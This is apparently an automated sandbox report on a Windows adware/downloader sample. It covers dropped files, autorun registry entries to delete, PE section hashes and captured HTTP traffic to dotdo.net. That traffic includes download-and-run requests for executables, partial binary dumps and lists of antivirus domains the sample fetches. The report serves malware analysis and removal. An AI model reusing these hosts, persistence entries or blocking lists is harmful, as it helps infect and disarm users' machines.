%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\vchk[1].htm (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\ckkkp[1].htm (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\localhost[1].htm (716 bytes)
C:\a\vv11111.txt (22835 bytes)
C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (11 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\uniqueDYK287G2Jhwy64P0Ln0s[1].htm (10 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
C:\a\29935426.bat (287 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\DYK287G2Jhwy64P0Ln0s.exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (20 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\bdcount[1].htm (8 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (13 bytes)
C:\a\ver.ini (8 bytes)
C:\a\getcap.exe (10027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueDYK287G2Jhwy64P0Ln0s.ini (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\cki[1].htm (11 bytes)
%System%\63839615.bat (19 bytes)
C:\a\install.txt (1 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
C:\a\lOD0hGDlkq.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (5289 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dutoauto" = "C:\a\wincheckfe.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"autoauto" = "63839615.bat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "63839615.bat" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 65536 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 258048 | 2528 | 2560 | 3.12403 | 3333d5ca3c163ed95562eb98d8231779 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 10
6e9a02e45ff743e1e4fadd370e2903eb
aba7046b8baa12b2f0d4c8e67c5ee5dc
71cc6609b8db5735ef1d0cf991f0ee49
b8c773eb87a0e41fc08ac983d38eaae0
48423276abbd0ba36915f6c270ce2246
d433981901923cfc7761708c0a8c1bba
000b647a23034792225a3ab9da073d23
c9011de3725d8bff7315a68c4adbad5b
6f36ebfe9bcdb0e9ce78f8200cc42804
2c6ca3869994304875f192b610227269
Network Activity
URLs
URL | IP |
---|---|
hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; | 81.17.31.2 |
hxxp://dotdo.net/act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1®=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 | 81.17.31.2 |
hxxp://dotdo.net/act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 | 81.17.31.2 |
hxxp://dotdo.net/act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe | 81.17.31.2 |
hxxp://dotdo.net/act/exevc/vchk.exe | 81.17.31.2 |
hxxp://dotdo.net/act/txt/hho.txt | 81.17.31.2 |
hxxp://dotdo.net/act/txt/uur.txt | 81.17.31.2 |
hxxp://dotdo.net/act/txt/vv.txt | 81.17.31.2 |
hxxp://dotdo.net/act/txt/vchk.txt | 81.17.31.2 |
hxxp://dotdo.net/ckkkp.html | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/uur.txt | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/exevc/vchk.exe | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/vchk.txt | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1®=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 | 81.17.31.2 |
hxxp://dotdo.net/ckkk.html | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/hho.txt | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe | 81.17.31.2 |
hxxp://dotap.dotdo.net/act/txt/vv.txt | 81.17.31.2 |
fp0.dotdo.net | 109.123.123.124 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /act/exevc/vchk.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT
ETag: "16a000000026349-ddb0-51dad696a4296"
Accept-Ranges: bytes
Content-Length: 56752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; HTTP/1.1
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:04 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 11
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...googgoodHTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:04 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..X-Powered-By: PHP/5.3.13..Content-Length: 11..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html.....googgood..
GET /act/txt/vchk.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:13 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
2990..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOASPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePose.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePose.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.FragileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.SimpleforYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Hatchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.MountainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.exe.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.BrowserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOASPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.BetweenLines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHelper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTronic.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e
<<< skipped >>>
GET /ckkkp.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:40 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT
ETag: "100000000026c77-9f-508fdd8811aa8"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>..HTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:40 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT..ETag: "100000000026c77-9f-508fdd8811aa8"..Accept-Ranges: bytes..Content-Length: 159..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>....
GET /act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1®=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:07 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
[a]..v=6....
GET /act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:07 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
[a]..v=yes....
GET /act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:07 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Tue, 26 May 2015 16:50:52 GMT
ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"
Accept-Ranges: bytes
Content-Length: 57251
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /ckkk.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:31 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT
ETag: "1d6000000029282-91-50a497515eff0"
Accept-Ranges: bytes
Content-Length: 145
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>..</body>..</html>..HTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:31 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>..</body>..</html>......
GET /act/txt/hho.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 4084
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
VVV.later-download.com.later-download.com.VVV.evodownload.com.evodownload.com.cdn.castplatform.com.m3.zlvijp.com.zonealarm.com.VVV.zonealarm.com.download.zonealarm.com.VVV.malwarebytes.org.malwarebytes.org.d.instashareonline.com.instashareonline.com.VVV.instashareonline.com.cdn.optimizely.com.fp114.digitaloptout.com.VVV.superfish.com.superfish.com.static.scanscout.com.z7hcp7lnkxu.st31g1duz2.com.ads.pubmatic.com.f-secure.com.VVV.f-secure.com.gripdownload.co.d.jazzedcdn.com.VVV.gripdownload.co.360safe.com.VVV.360safe.com.comodo.com.VVV.comodo.com.personalfirewall.comodo.com.comodo-internet-security.en.softonic.com.srv.quikdisplay.com.VVV.dimtron.com.dimtron.com.d.gettvwizard.com.d.instashareonline.com.instashareonline.com.VVV.instashareonline.com.apiboxrockinfo-a.akamaihd.net.b3.playfizz.com.apitechgilenet-a.akamaihd.net.d2d6i1lejl34hs.cloudfront.net.jelly.hatonafish.com.nps.donutleads.com.app.donutleads.com.istatic.datafastguru.info.pstatic.datafastguru.info.static.datafastguru.info.datafastguru.info.VVV.datafastguru.info.jsgnr.datafastguru.info.cdn.sharedaddomain.com.VVV.sharedaddomain.com.cdn.sharedaddomain.com.besttv39.cdn.it.best-tv.com.nps.donutleads.com.VVV.donutleads.com.donutleads.com.securepaths.com.VVV.securepaths.com.upgrade-software.org.VVV.upgrade-software.org.nps.pastaleads.com.pastaleads.com.www.pastaleads.com.app.pastaleads.com.74faa29e28b0e.com.VVV.74faa29e28b0e.com.VVV.safedownloadsrus108.com.safedownloadsrus108.com.VVV.v4download.com.v4download.com.VVV.v4download2.biz.v4download2.biz.VVV.4fbd0
<<< skipped >>>
GET /act/txt/uur.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 2093
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
